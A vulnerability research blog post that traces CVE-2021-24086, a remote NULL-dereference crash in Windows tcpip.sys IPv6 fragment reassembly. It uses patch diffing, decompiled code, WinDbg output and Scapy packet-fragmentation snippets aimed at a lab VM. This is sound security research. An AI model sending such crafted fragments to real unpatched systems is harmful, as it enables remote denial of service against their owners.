Since the beginning of my journey in computer security I have always been amazed and fascinated by true remote vulnerabilities. By true remotes, I mean bugs that are triggerable remotely without any user interaction. Not even a single click. As a result I am always on the lookout for such vulnerabilities.

On the Tuesday 13th of October 2020, Microsoft released a patch for CVE-2020-16898 which is a vulnerability affecting Windows' tcpip.sys kernel-mode driver dubbed Bad neighbor. Here is the description from Microsoft:

A remote code execution vulnerability exists when the Windows TCP/IP stack improperly
handles ICMPv6 Router Advertisement packets. An attacker who successfully exploited this vulnerability could gain
the ability to execute code on the target server or client. To exploit this vulnerability, an attacker would have
to send specially crafted ICMPv6 Router Advertisement packets to a remote Windows computer.
The update addresses the vulnerability by correcting how the Windows TCP/IP stack handles ICMPv6 Router Advertisement
packets.

The vulnerability really did stand out to me: remote vulnerabilities affecting TCP/IP stacks seemed extinct and being able to remotely trigger a memory corruption in the Windows kernel is very interesting for an attacker. Fascinating.

Not having diffed Microsoft patches in years, I figured it would be a fun exercise to go through. I knew that I wouldn't be the only one working on it, as those unicorns get a lot of attention from internet hackers. Indeed, my friend pi3 was so fast to diff the patch, write a PoC and write a blogpost that I didn't even have time to start, oh well :)

That is why when Microsoft blogged about another set of vulnerabilities being fixed in tcpip.sys I figured I might be able to work on those this time. Again, I knew for a fact that I wouldn't be the only one racing to write the first public PoC for CVE-2021-24086 but somehow the internet stayed silent long enough for me to complete this task which is very surprising :)

In this blogpost I will take you on my journey from zero to BSoD. From diffing the patches, reverse-engineering tcpip.sys and fighting our way through writing a PoC for CVE-2021-24086. If you came here for the code, fair enough, it is available on my github: 0vercl0k/CVE-2021-24086.

TL;DR

For the readers that want to get the scoop, CVE-2021-24086 is a NULL dereference in tcpip!Ipv6pReassembleDatagram that can be triggered remotely by sending a series of specially crafted packets. The issue happens because of the way the code treats the network buffer:

void Ipv6pReassembleDatagram(Packet_t *Packet, Reassembly_t *Reassembly, char OldIrql)
{
  // ...
  const uint32_t UnfragmentableLength = Reassembly->UnfragmentableLength;
  const uint32_t TotalLength = UnfragmentableLength + Reassembly->DataLength;
  const uint32_t HeaderAndOptionsLength = UnfragmentableLength + sizeof(ipv6_header_t);
  // …
  NetBufferList = (_NET_BUFFER_LIST *)NetioAllocateAndReferenceNetBufferAndNetBufferList(
                                        IppReassemblyNetBufferListsComplete,
                                        Reassembly,
                                        0,
                                        0,
                                        0,
                                        0);
  if ( !NetBufferList )
  {
    // ...
    goto Bail_0;
  }

  FirstNetBuffer = NetBufferList->FirstNetBuffer;
  if ( NetioRetreatNetBuffer(FirstNetBuffer, uint16_t(HeaderAndOptionsLength), 0) < 0 )
  {
    // ...
    goto Bail_1;
  }

  Buffer = (ipv6_header_t *)NdisGetDataBuffer(FirstNetBuffer, HeaderAndOptionsLength, 0i64, 1u, 0);
  //...
  *Buffer = Reassembly->Ipv6;

A fresh NetBufferList (abbreviated NBL) is allocated by NetioAllocateAndReferenceNetBufferAndNetBufferList and NetioRetreatNetBuffer allocates a Memory Descriptor List (abbreviated MDL) of uint16_t(HeaderAndOptionsLength) bytes. This integer truncation from uint32_t is important.

Once the network buffer has been allocated, NdisGetDataBuffer is called to gain access to a contiguous block of data from the fresh network buffer. This time though, HeaderAndOptionsLength is not truncated, which allows an attacker to trigger a special condition in NdisGetDataBuffer and make it fail. This condition is hit when uint16_t(HeaderAndOptionsLength) != HeaderAndOptionsLength. When the function fails, it returns NULL, and Ipv6pReassembleDatagram blindly trusts this pointer and does a memory write, bugchecking the machine. To pull this off, you need to trick the network stack into receiving an IPv6 fragment with a very large amount of headers. Here is what the bugcheck looks like:

trigger
KDTARGET: Refreshing KD connection

*** Fatal System Error: 0x000000d1
                       (0x0000000000000000,0x0000000000000002,0x0000000000000001,0xFFFFF8054A5CDEBB)

Break instruction exception - code 80000003 (first chance)

A fatal system error has occurred.
Debugger entered on first try; Bugcheck callbacks have not been invoked.

A fatal system error has occurred.

nt!DbgBreakPointWithStatus:
fffff805`473c46a0 cc              int     3

kd> kc
 # Call Site
00 nt!DbgBreakPointWithStatus
01 nt!KiBugCheckDebugBreak
02 nt!KeBugCheck2
03 nt!KeBugCheckEx
04 nt!KiBugCheckDispatch
05 nt!KiPageFault
06 tcpip!Ipv6pReassembleDatagram
07 tcpip!Ipv6pReceiveFragment
08 tcpip!Ipv6pReceiveFragmentList
09 tcpip!IppReceiveHeaderBatch
0a tcpip!IppFlcReceivePacketsCore
0b tcpip!IpFlcReceivePackets
0c tcpip!FlpReceiveNonPreValidatedNetBufferListChain
0d tcpip!FlReceiveNetBufferListChainCalloutRoutine
0e nt!KeExpandKernelStackAndCalloutInternal
0f nt!KeExpandKernelStackAndCalloutEx
10 tcpip!FlReceiveNetBufferListChain
11 NDIS!ndisMIndicateNetBufferListsToOpen
12 NDIS!ndisMTopReceiveNetBufferLists

For anybody else in for a long ride, let's get to it :)

Recon

Even though Francisco Falcon already wrote a cool blogpost discussing his work on this case, I have decided to also write up mine; I'll try to cover aspects that are less covered or not covered in his post, like tcpip.sys internals for example.

All right, let's start at the beginning: at this point I don't know anything about tcpip.sys and I don't know anything about the bugs getting patched. Microsoft's blogpost is helpful because it gives us a bunch of clues:

  • There are three different vulnerabilities that seemed to involve fragmentation in IPv4 & IPv6,
  • Two of them are rated as Remote Code Execution which means that they cause memory corruption somehow,
  • One of them causes a DoS which means somehow it likely bugchecks the target.

According to this tweet, we also learn that those flaws were found internally by Microsoft's own @piazzt, which is awesome.

Googling around also reveals a bunch more useful information, as it would seem that Microsoft privately shared PoCs with their partners via the MAPP program.

At this point I decided to focus on the DoS vulnerability (CVE-2021-24086) as a first step. I figured it might be easier to trigger, and that I might be able to use the knowledge acquired while triggering it to better understand tcpip.sys and maybe work on the other ones if time and motivation allow.

The next logical step is to diff the patches to identify the fixes.

Diffing Microsoft patches in 2021

I honestly can't remember the last time I diff'd Microsoft patches; probably around Windows XP / Windows 7 times. Since then, a lot has changed though. The security updates are now cumulative, which means that packages embed every fix known to date. You can grab packages directly from the Microsoft Update Catalog, which is handy. Last but not least, Windows Updates now use forward / reverse differentials; you can read this to know more about what it means.

Extracting and Diffing Windows Patches in 2020 is a great blog post that talks about how to unpack the patches off an update package and how to apply the differentials. The output of this work is basically the tcpip.sys binary before and after the update. If you don't feel like doing this yourself, I've uploaded the two binaries (as well as their respective public PDBs) that you can use to do the diffing yourself: 0vercl0k/CVE-2021-24086/binaries. Also, I have been made aware after publishing this post about the amazing winbindex website which indexes Windows binaries and lets you download them in a click. Here is the index available for tcpip.sys as an example.

Once we have the before and after binaries, a little dance with IDA and the good ol’ BinDiff yields the below:

[image: BinDiff comparison of the patched and unpatched tcpip.sys]

There aren't a whole lot of changes to look at which is nice, and focusing on Ipv6pReassembleDatagram feels right. Microsoft's workaround mentioned disabling packet reassembly (netsh int ipv6 set global reassemblylimit=0) and this function seems to be reassembling datagrams; close enough right?

After looking at it for a little while, I noticed that the patched binary introduced this new, interesting-looking basic block:

[image: the new basic block introduced by the patch]

It ends with what looks like a comparison against the 0xffff integer and a conditional jump that either bails out or keeps going. This looks very interesting because some articles mentioned that the bug could be triggered with a packet containing a large number of headers. Not that you should trust those types of news articles, as they are usually not technically accurate and sensationalized, but there might be some truth to it. At this point, I felt pretty good about it and decided to stop diffing and start reverse-engineering. I assumed the issue would be some sort of integer overflow / truncation that would be easy to trigger based on the name of the function. We just need to send a big packet, right?

Reverse-engineering tcpip.sys

This is where the real journey starts, along with the usual emotional rollercoaster of studying vulnerabilities. I initially thought I would be done with this in a few days, or a week. Oh boy, was I wrong.

Baby steps

The first thing I did was to prepare a lab environment. I installed a Windows 10 VM (target) and a Linux VM (attacker), set up KDNet and kernel debugging to debug the target, installed Wireshark / Scapy (v2.4.4), and created a virtual switch which the two VMs share. And... finally loaded tcpip.sys in IDA. The module looked pretty big and complex at first sight - no big surprise there; it implements the Windows IPv4 & IPv6 network stack after all. I started the adventure by focusing on Ipv6pReassembleDatagram. Here is the piece of assembly code that we saw earlier in BinDiff and that looked interesting:

[image: the patched basic block in IDA]

Great, that's a start. Before going deep down the rabbit hole of reverse-engineering, I decided to try to hit the function and be able to debug it with WinDbg. As the function name suggests reassembly, I wrote the following code and threw it at my target:

from scapy.all import *

pkt = Ether() / IPv6(dst = 'ff02::1') / UDP() / ('a' * 0x1000)
sendp(fragment6(pkt, 500), iface = 'eth1')

This successfully triggers the breakpoint in WinDbg; neat:

kd> g
Breakpoint 0 hit
tcpip!Ipv6pReassembleDatagram:
fffff802`2edcdd6c 4488442418      mov     byte ptr [rsp+18h],r8b

kd> kc
 # Call Site
00 tcpip!Ipv6pReassembleDatagram
01 tcpip!Ipv6pReceiveFragment
02 tcpip!Ipv6pReceiveFragmentList
03 tcpip!IppReceiveHeaderBatch
04 tcpip!IppFlcReceivePacketsCore
05 tcpip!IpFlcReceivePackets
06 tcpip!FlpReceiveNonPreValidatedNetBufferListChain
07 tcpip!FlReceiveNetBufferListChainCalloutRoutine
08 nt!KeExpandKernelStackAndCalloutInternal
09 nt!KeExpandKernelStackAndCalloutEx
0a tcpip!FlReceiveNetBufferListChain

We can even observe the fragmented packets in Wireshark which is also pretty cool:

[image: the fragmented packets captured in Wireshark]

For those that are not familiar with packet fragmentation, it is a mechanism used to chop large packets (larger than the Maximum Transmission Unit) into smaller chunks so that they can be sent across network equipment. The receiving network stack has the burden of stitching them all back together in a safe manner (winkwink).

All right, perfect. We now have what I consider a good enough research environment and we can start digging deep into the code. At this point, let's not focus on the vulnerability yet but instead try to understand how the code works, the type of arguments it receives, recover structures and the semantics of important fields, etc. Let's make our HexRays decompilation output pretty.

As you might imagine, this is the part that's the most time consuming. I use a mixture of bottom-up, top-down. Loads of experiments. Commenting the decompiled code as best as I can, challenging myself by asking questions, answering them, rinse & repeat.

High level overview

Oftentimes, studying code / features in isolation in complex systems is not enough; it only takes you so far. Complex drivers like tcpip.sys are gigantic, carry a lot of state, and are hard to reason about, both in terms of execution and data flow. In this case, there is this sort of size integer that seems to be related to something that got received, and we want to set it to 0xffff. Unfortunately, just focusing on Ipv6pReassembleDatagram and Ipv6pReceiveFragment was not enough for me to make significant progress. It was worth a try though, but time to switch gears.

Zooming out

All right, that's cool, our HexRays decompiled code is getting prettier and prettier; it feels rewarding. We have abused the create new structure feature to lift a bunch of structures. We guessed about the semantics of some of them but most are still unknown. So yeah, let's work smarter.

We know that tcpip.sys receives packets from the network; we don't know exactly how or where from, but maybe we don't need to know that much. One of the first questions you might ask yourself is: how does the kernel store network data? What structures does it use?

NET_BUFFER & NET_BUFFER_LIST

If you have some Windows kernel experience, you might be familiar with NDIS and you might also have heard about some of the APIs and the structures it exposes to users. It is documented because third-parties can develop extensions and drivers to interact with the network stack at various points.

An important structure in this world is NET_BUFFER. This is what it looks like in WinDbg:

kd> dt NDIS!_NET_BUFFER
NDIS!_NET_BUFFER
   +0x000 Next             : Ptr64 _NET_BUFFER
   +0x008 CurrentMdl       : Ptr64 _MDL
   +0x010 CurrentMdlOffset : Uint4B
   +0x018 DataLength       : Uint4B
   +0x018 stDataLength     : Uint8B
   +0x020 MdlChain         : Ptr64 _MDL
   +0x028 DataOffset       : Uint4B
   +0x000 Link             : _SLIST_HEADER
   +0x000 NetBufferHeader  : _NET_BUFFER_HEADER
   +0x030 ChecksumBias     : Uint2B
   +0x032 Reserved         : Uint2B
   +0x038 NdisPoolHandle   : Ptr64 Void
   +0x040 NdisReserved     : [2] Ptr64 Void
   +0x050 ProtocolReserved : [6] Ptr64 Void
   +0x080 MiniportReserved : [4] Ptr64 Void
   +0x0a0 DataPhysicalAddress : _LARGE_INTEGER
   +0x0a8 SharedMemoryInfo : Ptr64 _NET_BUFFER_SHARED_MEMORY
   +0x0a8 ScatterGatherList : Ptr64 _SCATTER_GATHER_LIST

It can look overwhelming but we don't need to understand every detail. What is important is that the network data is stored in a regular MDL. Like MDLs, NET_BUFFERs can be chained together, which allows the kernel to store a large amount of data in a bunch of non-contiguous chunks of physical memory; virtual memory is the magic wand used to make the data look contiguous. For readers that are not familiar with Windows kernel development, an MDL is a Windows kernel construct that allows users to map physical memory into a contiguous virtual memory region. Every MDL is actually followed by a list of PFNs (which don't need to be contiguous) that the Windows kernel is able to map into a contiguous virtual memory region; magic.

kd> dt nt!_MDL
   +0x000 Next             : Ptr64 _MDL
   +0x008 Size             : Int2B
   +0x00a MdlFlags         : Int2B
   +0x00c AllocationProcessorNumber : Uint2B
   +0x00e Reserved         : Uint2B
   +0x010 Process          : Ptr64 _EPROCESS
   +0x018 MappedSystemVa   : Ptr64 Void
   +0x020 StartVa          : Ptr64 Void
   +0x028 ByteCount        : Uint4B
   +0x02c ByteOffset       : Uint4B

A NET_BUFFER_LIST is basically a structure to keep track of a list of NET_BUFFERs, as the name suggests:

kd> dt NDIS!_NET_BUFFER_LIST
   +0x000 Next             : Ptr64 _NET_BUFFER_LIST
   +0x008 FirstNetBuffer   : Ptr64 _NET_BUFFER
   +0x000 Link             : _SLIST_HEADER
   +0x000 NetBufferListHeader : _NET_BUFFER_LIST_HEADER
   +0x010 Context          : Ptr64 _NET_BUFFER_LIST_CONTEXT
   +0x018 ParentNetBufferList : Ptr64 _NET_BUFFER_LIST
   +0x020 NdisPoolHandle   : Ptr64 Void
   +0x030 NdisReserved     : [2] Ptr64 Void
   +0x040 ProtocolReserved : [4] Ptr64 Void
   +0x060 MiniportReserved : [2] Ptr64 Void
   +0x070 Scratch          : Ptr64 Void
   +0x078 SourceHandle     : Ptr64 Void
   +0x080 NblFlags         : Uint4B
   +0x084 ChildRefCount    : Int4B
   +0x088 Flags            : Uint4B
   +0x08c Status           : Int4B
   +0x08c NdisReserved2    : Uint4B
   +0x090 NetBufferListInfo : [29] Ptr64 Void

Again, no need to understand every detail, thinking in concepts is good enough. On top of that, Microsoft makes our life easier by providing a very useful WinDbg extension called ndiskd. It exposes two functions to dump NET_BUFFER and NET_BUFFER_LIST: !ndiskd.nb and !ndiskd.nbl respectively. These are a big time saver because they'll take care of walking the various levels of indirection: list of NET_BUFFERs and chains of MDLs.
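
To make those levels of indirection concrete, here is a small self-contained sketch that walks an NBL down to its MDLs and sums the backing byte count. The struct definitions are stripped-down stand-ins for the fields shown above (this is not the real NDIS layout, just an illustration of the walk):

#include <stdio.h>

struct mdl { struct mdl *Next; unsigned int ByteCount; };
struct net_buffer { struct net_buffer *Next; struct mdl *MdlChain; };
struct net_buffer_list { struct net_buffer_list *Next; struct net_buffer *FirstNetBuffer; };

static unsigned long long total_backing_bytes(const struct net_buffer_list *nbl)
{
    unsigned long long total = 0;
    for (; nbl; nbl = nbl->Next)                                                     /* chain of NBLs */
        for (const struct net_buffer *nb = nbl->FirstNetBuffer; nb; nb = nb->Next)   /* NBs in each NBL */
            for (const struct mdl *m = nb->MdlChain; m; m = m->Next)                 /* MDL chain in each NB */
                total += m->ByteCount;
    return total;
}

int main(void)
{
    struct mdl m2 = { 0, 512 }, m1 = { &m2, 1500 };
    struct net_buffer nb = { 0, &m1 };
    struct net_buffer_list nbl = { 0, &nb };
    printf("total backing bytes: %llu\n", total_backing_bytes(&nbl));                /* prints 2012 */
    return 0;
}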

The mechanics of parsing an IPv6 packet

Now that we know where and how network data is stored, we can ask ourselves how IPv6 packet parsing works. I have very little knowledge about networking, but I know that there are various headers that need to be parsed differently and that they chain together: layer N tells you what you'll find at the next layer.

What I am about to describe is what I have figured out while reverse-engineering as well as what I have observed during debugging it through a bazillions of experiments. Full disclosure: I am no expert so take it with a grain of salt :)

The top-level function of interest is IppReceiveHeaderBatch. The first thing it does is invoke IppReceiveHeadersHelper on every packet in the list:

if ( Packet )
{
    do
    {
        Next = Packet->Next;
        Packet->Next = 0;
        IppReceiveHeadersHelper(Packet, Protocol, ...);
        Packet = Next;
    }
    while ( Next );
}

Packet_t is an undocumented structure that is associated with received packets. A bunch of state is stored in this structure, and figuring out the semantics of important fields is time consuming. IppReceiveHeadersHelper's main role is to kick off the parsing machine. It parses the IPv6 (or IPv4) header of the packet and reads the next_header field. As I mentioned above, this field is very important because it indicates how to read the next layer of the packet. This value is kept in the Packet structure, and a bunch of functions read and update it during parsing.

NetBufferList = Packet->NetBufferList;
HeaderSize = Protocol->HeaderSize;
FirstNetBuffer = NetBufferList->FirstNetBuffer;
CurrentMdl = FirstNetBuffer->CurrentMdl;
if ( (CurrentMdl->MdlFlags & 5) != 0 )
    Va = CurrentMdl->MappedSystemVa;
else
    Va = MmMapLockedPagesSpecifyCache(CurrentMdl, 0, MmCached, 0, 0, 0x40000000u);
IpHdr = (ipv6_header_t *)((char *)Va + FirstNetBuffer->CurrentMdlOffset);
if ( Protocol == (Protocol_t *)Ipv4Global )
{
    // ...
}
else
{
    Packet->NextHeader = IpHdr->next_header;
    Packet->NextHeaderPosition = offsetof(ipv6_header_t, next_header);
    SrcAddrOffset = offsetof(ipv6_header_t, src);
}
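
For reference, here is a plausible layout for the lifted ipv6_header_t, consistent with the offsets the decompiled code relies on (next_header at offset 6, src at offset 8, dst at offset 24, sizeof == 0x28). This is my own reconstruction from the RFC 8200 fixed header, not a Microsoft definition:

#include <assert.h>
#include <stddef.h>
#include <stdint.h>

typedef struct ipv6_addr_t {
    union { uint8_t Byte[16]; uint16_t Word[8]; } u;
} ipv6_addr_t;

typedef struct ipv6_header_t {
    uint32_t    ver_tc_flow;        /* 4-bit version, 8-bit traffic class, 20-bit flow label */
    uint16_t    payload_length;     /* length of everything after this 40-byte header */
    uint8_t     next_header;        /* offset 6: tells you how to parse the next layer */
    uint8_t     hop_limit;
    ipv6_addr_t src;                /* offset 8 */
    ipv6_addr_t dst;                /* offset 24 */
} ipv6_header_t;

static_assert(offsetof(ipv6_header_t, next_header) == 6, "next_header offset");
static_assert(offsetof(ipv6_header_t, src) == 8, "src offset");
static_assert(offsetof(ipv6_header_t, dst) == 24, "dst offset");
static_assert(sizeof(ipv6_header_t) == 0x28, "header size");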

The function does a lot more; it initializes several Packet_t fields, but let's ignore that for now to avoid getting overwhelmed by complexity. Once the function returns back into IppReceiveHeaderBatch, it extracts a demuxer from the Protocol_t structure and invokes a parsing callback if the NextHeader is a valid extension header. The Protocol_t structure holds an array of Demuxer_t (the term used in the driver).

struct Demuxer_t
{
  void (__fastcall *Parse)(Packet_t *);
  void *f0;
  void *f1;
  void *Size;
  void *f3;
  _BYTE IsExtensionHeader;
  _BYTE gap[23];
};

struct Protocol_t
{
  // ...
  Demuxer_t Demuxers[277];
};

NextHeader (populated earlier in IppReceiveHeaderBatch) is the value used to index into this array.

[image: the demuxer array lookup in IDA]

If the demuxer handles an extension header, then a callback is invoked to parse the header properly. This happens in a loop until the parsing hits the first part of the packet that isn't an extension header, in which case it moves on to the next packet.

while ( ... )
{
    NetBufferList = RcvList->NetBufferList;
    IpProto = RcvList->NextHeader;
    if ( ... )
    {
        Demuxer = (Demuxer_t *)IpUdpEspDemux;
    }
    else
    {
        Demuxer = &Protocol->Demuxers[IpProto];
    }
    if ( !Demuxer->IsExtensionHeader )
        Demuxer = 0;
    if ( Demuxer )
        Demuxer->Parse(RcvList);
    else
        RcvList = RcvList->Next;
}

Makes sense - that's kinda how we would implement parsing of IPv6 packets as well right?

[image: the parsing loop in IDA]

It is easy to dump the demuxers and their associated NextHeader / Parse values; these might come in handy later.

- nh = 0  -> Ipv6pReceiveHopByHopOptions
- nh = 43 -> Ipv6pReceiveRoutingHeader
- nh = 44 -> Ipv6pReceiveFragmentList
- nh = 60 -> Ipv6pReceiveDestinationOptions
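
To make the chaining concrete, here is a small self-contained walker over the generic IPv6 extension-header format (first byte: next header, second byte: length in 8-byte units, not counting the first 8 bytes). It is my own illustration of what the demuxer loop does conceptually, not tcpip.sys code:

#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

static int is_extension_header(uint8_t nh)
{
    return nh == 0 || nh == 43 || nh == 44 || nh == 60;    /* HopByHop, Routing, Fragment, DestOpts */
}

static void walk(const uint8_t *pkt, size_t len, uint8_t first_nh)
{
    uint8_t nh = first_nh;
    size_t off = 0;
    while (is_extension_header(nh) && off + 8 <= len) {
        uint8_t next = pkt[off];                           /* byte 0: next header */
        size_t hdr_len = ((size_t)pkt[off + 1] + 1) * 8;   /* byte 1: length in 8-byte units */
        printf("extension header %u at offset %zu (%zu bytes), next=%u\n", nh, off, hdr_len, next);
        off += hdr_len;
        nh = next;
    }
    printf("upper-layer protocol %u starts at offset %zu\n", nh, off);
}

int main(void)
{
    /* A DestOpts header (8 bytes) chained to a Fragment header (8 bytes), then UDP (17). */
    uint8_t payload[16] = { 44, 0 };                       /* DestOpts: next=44 (Fragment), len=0 */
    payload[8] = 17;                                       /* Fragment header: next=17 (UDP) */
    walk(payload, sizeof(payload), 60);                    /* the IPv6 header said next_header=60 */
    return 0;
}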

A demuxer can expose a callback routine for parsing, which I called Parse. The Parse method receives a Packet and is free to update its state; for example, to grab the NextHeader needed to know how to parse the next layer. This is what Ipv6pReceiveFragmentList (Ipv6FragmentDemux.Parse) looks like:

[image: Ipv6pReceiveFragmentList in IDA]

It makes sure the next header is IPPROTO_FRAGMENT before going further. Again, makes sense.

The mechanics of IPv6 fragmentation

Now that we understand the overall flow a bit more, it is a good time to start thinking about fragmentation. We know we need to send fragmented packets to hit the code that was fixed by the update, which we know is important somehow. The function that parses fragments is Ipv6pReceiveFragment and it is hairy. Again, keeping track of fragments probably warrants that, so nothing unexpected here.

It's also the right time for us to read literature about how exactly IPv6 fragmentation works. Concepts have been useful until now, but at this point we need to understand the nitty-gritty details. I don't want to spend too much time on this as there is tons of content online discussing the subject so I'll just give you the fast version. To define a fragment, you need to add a fragmentation header which is called IPv6ExtHdrFragment in Scapy land:

class IPv6ExtHdrFragment(_IPv6ExtHdr):
    name = "IPv6 Extension Header - Fragmentation header"
    fields_desc = [ByteEnumField("nh", 59, ipv6nh),
                   BitField("res1", 0, 8),
                   BitField("offset", 0, 13),
                   BitField("res2", 0, 2),
                   BitField("m", 0, 1),
                   IntField("id", None)]
    overload_fields = {IPv6: {"nh": 44}}

The most important fields for us are:

  • offset, which tells the start offset of where the data that follows this header should be placed in the reassembled packet
  • the m bit, which specifies whether or not this is the last fragment.

Note that the offset field is expressed in 8-byte blocks; if you set it to 1, it means that your data will be placed at +8 bytes. If you set it to 2, it will be at +16 bytes, etc.

Here is a small ghetto IPv6 fragmentation function I wrote to ensure I was understanding things properly. I enjoy learning through practice. (Scapy has fragment6):

def frag6(target, frag_id, bytes, nh, frag_size = 1008):
    '''Ghetto fragmentation.'''
    assert (frag_size % 8) == 0
    leftover = bytes
    offset = 0
    frags = []
    while len(leftover) > 0:
        chunk = leftover[: frag_size]
        leftover = leftover[len(chunk): ]
        last_pkt = len(leftover) == 0
        # 0 -> No more / 1 -> More
        m = 0 if last_pkt else 1
        assert offset < 8191
        pkt = Ether() \
            / IPv6(dst = target) \
            / IPv6ExtHdrFragment(m = m, nh = nh, id = frag_id, offset = offset) \
            / chunk

        offset += (len(chunk) // 8)
        frags.append(pkt)
    return frags

Easy enough. The other important aspect of fragmentation in the literature is related to IPv6 headers and what is called the unfragmentable part of a packet. Here is how Microsoft describes the unfragmentable part: "This part consists of the IPv6 header, the Hop-by-Hop Options header, the Destination Options header for intermediate destinations, and the Routing header". It is also the part that precedes the fragmentation header. Obviously, if there is an unfragmentable part, there is a fragmentable part. Easy: the fragmentable part is what you are sending behind the fragmentation header. Reassembly is the process of stitching together the unfragmentable part with the reassembled fragmentable part into one beautiful reassembled packet. Here is a diagram taken from Understanding the IPv6 Header that sums it up pretty well:

[image: IPv6 fragmentation diagram from Understanding the IPv6 Header]

All of this theoretical information is very useful because we can now look for those details while we reverse-engineer. It is always easier to read code and try to match it against what it is supposed or expected to do.

Theory vs practice: Ipv6pReceiveFragment

At this point, I felt I had accumulated enough new information and it was time to zoom back into the target. We want to verify that reality works like the literature says it does, and by doing so we will improve our overall understanding. After studying this code for a while, we start to understand the broad strokes. The function receives a Packet, but as this structure is packet-specific, it is not enough to track the state required to reassemble a whole datagram. This is why another important structure is used for that; I called it Reassembly.

The overall flow is basically broken up into three main parts; again, no need for us to understand every single detail, let's just understand it conceptually: what it tries to achieve and how:

  • 1 - Figure out if the received fragment is part of an already existing Reassembly. According to the literature, we know that network stacks should use the source address, the destination address as well as the fragmentation header's identifier to determine if the current packet is part of a group of fragments. In practice, the function IppReassemblyHashKey hashes those fields together and the resulting hash is used to index into a hash-table that stores Reassembly structures (Ipv6pFragmentLookup):
int IppReassemblyHashKey(__int64 Iface, int Identification, __int64 Pkt)
{
  //...
  Protocol = *(_QWORD *)(Iface + 40);
  OffsetSrcIp = 12i64;
  AddressLength = *(unsigned __int16 *)(*(_QWORD *)(Protocol + 16) + 6i64);
  if ( Protocol != Ipv4Global )
    OffsetSrcIp = offsetof(ipv6_header_t, src);
  H = RtlCompute37Hash(
        g_37HashSeed,
        Pkt + OffsetSrcIp,
        AddressLength);
  OffsetDstIp = 16i64;
  if ( Protocol != Ipv4Global )
    OffsetDstIp = offsetof(ipv6_header_t, dst);
  H2 = RtlCompute37Hash(H, Pkt + OffsetDstIp, AddressLength);
  return RtlCompute37Hash(H2, &Identification, 4i64) | 0x80000000;
}

Reassembly_t* Ipv6pFragmentLookup(__int64 Iface, int Identification, ipv6_header_t *Pkt, KIRQL *OldIrql)
{
  // ...
  v5 = *(_QWORD *)Iface;
  Context.Signature = 0;
  HashKey = IppReassemblyHashKey(v5, Identification, (__int64)Pkt);
  *OldIrql = KeAcquireSpinLockRaiseToDpc(&Ipp6ReassemblyHashTableLock);
  *(_OWORD *)&Context.ChainHead = 0;
  for ( CurrentReassembly = (Reassembly_t *)RtlLookupEntryHashTable(&Ipp6ReassemblyHashTable, HashKey, &Context);
        ;
        CurrentReassembly = (Reassembly_t *)RtlGetNextEntryHashTable(&Ipp6ReassemblyHashTable, &Context) )
  {
    // If we have walked through all the entries in the hash-table,
    // then we can just bail.
    if ( !CurrentReassembly )
      return 0;
    // If the current entry matches our iface, pkt id, ip src/dst
    // then we found a match!
    if ( CurrentReassembly->Iface == Iface
      && CurrentReassembly->Identification == Identification
      && memcmp(&CurrentReassembly->Ipv6.src.u.Byte[0], &Pkt->src.u.Byte[0], 16) == 0
      && memcmp(&CurrentReassembly->Ipv6.dst.u.Byte[0], &Pkt->dst.u.Byte[0], 16) == 0 )
    {
      break;
    }
  }
  // ...
  return CurrentReassembly;
}
  • 1.1 - If the fragment doesn't belong to any known group, it needs to be put in a newly created Reassembly. This is what IppCreateInReassemblySet does. It's worth noting that this is a point of interest for a reverse-engineer because this is where the Reassembly object gets allocated and constructed (in IppCreateReassembly). It means we can retrieve its size as well as some more information about some of the fields.
Reassembly_t *IppCreateInReassemblySet(
    PKSPIN_LOCK SpinLock, void *Src, __int64 Iface, __int64 Identification, KIRQL NewIrql
)
{
  Reassembly_t *Reassembly = IppCreateReassembly(Src, Iface, Identification);
  if ( Reassembly )
  {
    IppInsertReassembly((__int64)SpinLock, Reassembly);
    KeAcquireSpinLockAtDpcLevel(&Reassembly->Lock);
    KeReleaseSpinLockFromDpcLevel(SpinLock);
  }
  else
  {
    KeReleaseSpinLock(SpinLock, NewIrql);
  }
  return Reassembly;
}

[image: IppCreateReassembly in IDA]
  • 2 - Now that we have a Reassembly structure, the main function wants to figure out where the current fragment fits in the overall reassembled packet. The Reassembly keeps track of fragments using various lists. It uses a ContiguousList that chains fragments that will be contiguous in the reassembled packet. IppReassemblyFindLocation is the function that seems to implement the logic to figure out where the current fragment fits.

  • 2.1 - If IppReassemblyFindLocation returns a pointer to the start of the ContiguousList, it means that the current packet is the first fragment. This is where the function extracts and keeps track of the unfragmentable part of the packet. It is kept in a pool buffer that is referenced in the Reassembly structure.

if ( ReassemblyLocation == &Reassembly->ContiguousStartList )
{
  Reassembly->NextHeader = Fragment->nexthdr;
  UnfragmentableLength = LOWORD(Packet->NetworkLayerHeaderSize) - 48;
  Reassembly->UnfragmentableLength = UnfragmentableLength;
  if ( UnfragmentableLength )
  {
    UnfragmentableData = ExAllocatePoolWithTagPriority(
      (POOL_TYPE)512,
      UnfragmentableLength,
      'erPI',
      LowPoolPriority
    );
    Reassembly->UnfragmentableData = UnfragmentableData;
    if ( !UnfragmentableData )
    {
      // ...
      goto Bail_0;
    }
    // ...
    // Copy the unfragmentable part of the packet inside the pool
    // buffer that we have allocated.
    RtlCopyMdlToBuffer(
      FirstNetBuffer->MdlChain,
      FirstNetBuffer->DataOffset - Packet->NetworkLayerHeaderSize + 0x28,
      Reassembly->UnfragmentableData,
      Reassembly->UnfragmentableLength,
      v51);
    NextHeaderOffset = Packet->NextHeaderPosition;
  }
  Reassembly->NextHeaderOffset = NextHeaderOffset;
  *(_QWORD *)&Reassembly->Ipv6 = *(_QWORD *)Packet->Ipv6Hdr;
}
  • 3 - The fragment is then added into the Reassembly as part of a group of fragments by IppReassemblyInsertFragment. On top of that, if we have received every fragment necessary to start a reassembly, the function Ipv6pReassembleDatagram is invoked. Remember this guy? This is the function that has been patched and that we hit earlier in the post. But this time, we understand how we got there.

At this stage we have an OK understanding of the data structures involved in keeping track of groups of fragments and of how/when reassembly gets kicked off. We've also commented and refined various structure fields that we lifted early in the process; this is very helpful because now we can understand the fix for the vulnerability:

void Ipv6pReassembleDatagram(Packet_t *Packet, Reassembly_t *Reassembly, char OldIrql)
{
  //...
  UnfragmentableLength = Reassembly->UnfragmentableLength;
  TotalLength = UnfragmentableLength + Reassembly->DataLength;
  HeaderAndOptionsLength = UnfragmentableLength + sizeof(ipv6_header_t);
  // Below is the added code by the patch
  if ( TotalLength > 0xFFFF ) {
      // Bail
  }

How cool is that? That's really rewarding. Putting in a bunch of work that may feel not that useful at the time, but eventually adds up, snow-balls and really moves the needle forward. It's just a slow process and you gotta get used to it; that's just how the sausage is made.

